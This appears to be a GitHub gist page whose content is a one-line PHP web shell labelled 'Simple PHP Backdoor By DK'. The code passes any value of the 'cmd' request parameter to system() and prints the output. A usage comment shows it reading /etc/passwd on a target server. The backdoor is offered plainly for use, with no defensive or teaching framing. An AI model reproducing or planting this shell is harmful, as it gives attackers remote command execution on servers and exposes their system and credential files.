Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save KeyStrOke95/d79951615ce89c222a3108d196a9e136 to your computer and use it in GitHub Desktop.
Save KeyStrOke95/d79951615ce89c222a3108d196a9e136 to your computer and use it in GitHub Desktop.

Revisions

  1. @themightyshiv themightyshiv renamed this gist Nov 16, 2013. 1 changed file with 0 additions and 0 deletions.
  2. @themightyshiv themightyshiv renamed this gist Nov 16, 2013. 1 changed file with 0 additions and 0 deletions.
    File renamed without changes.
  3. @themightyshiv themightyshiv renamed this gist Nov 16, 2013. 1 changed file with 0 additions and 0 deletions.
    File renamed without changes.
  4. @themightyshiv themightyshiv created this gist Nov 16, 2013.
    3 changes: 3 additions & 0 deletions One-Liner-PHP-Shell
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,3 @@
    <!-- Simple PHP Backdoor By DK (One-Liner Version) -->
    <!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
    <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>